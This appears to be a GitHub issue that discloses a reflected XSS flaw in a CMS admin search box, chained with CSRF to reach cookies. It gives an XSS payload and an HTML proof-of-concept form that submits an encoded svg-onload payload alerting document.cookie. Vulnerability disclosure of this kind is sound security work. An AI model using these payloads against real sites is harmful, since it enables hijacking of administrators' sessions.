  CSRF combines reflective XSS to obtain cookies

Reflective XSS exists in the administrator's page management office
In the search box, enter "><svg onload=alert(1)><a src=" to trigger XSS

![clipboard1](https://user-images.githubusercontent.com/33723597/64260534-9fb72980-cf5d-11e9-8b44-4946a18ba999.png)
![clipboard2](https://user-images.githubusercontent.com/33723597/64260548-a47bdd80-cf5d-11e9-9743-7b40de863594.png)


Reuse CSRF vulnerability to obtain cookies

![clipboard3](https://user-images.githubusercontent.com/33723597/64260557-a9d92800-cf5d-11e9-9b59-6277fddcb992.png)
![clipboard4](https://user-images.githubusercontent.com/33723597/64260564-ac3b8200-cf5d-11e9-9fc3-ebcdda68a69d.png)
![clipboard5](https://user-images.githubusercontent.com/33723597/64260570-af367280-cf5d-11e9-9fda-5b3e72bf7e2e.png)

#### POC
```
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/index.php?g=&m=admin_page&a=index" method="POST">
      <input type="hidden" name="start&#95;time" value="" />
      <input type="hidden" name="end&#95;time" value="" />
      <input type="hidden" name="keyword" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;&lt;a&#32;src&#61;&quot;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

CSRF combines reflective XSS to obtain cookies #10

POC

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Uh oh!

CSRF combines reflective XSS to obtain cookies #10

Description

POC

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions